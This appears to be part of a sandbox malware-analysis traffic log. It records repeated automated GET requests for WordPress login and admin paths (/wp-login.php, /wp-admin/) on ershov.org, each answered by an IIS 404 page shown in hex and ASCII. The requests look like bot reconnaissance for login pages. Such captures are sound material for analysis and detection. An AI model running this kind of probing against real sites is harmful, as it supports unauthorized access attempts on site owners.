                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.326647043 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                159192.168.2.65755981.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.899635077 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.114928961 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.115101099 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.116219044 CET264OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.330816031 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.330826998 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                160192.168.2.65755881.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.899895906 CET226OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.114943027 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
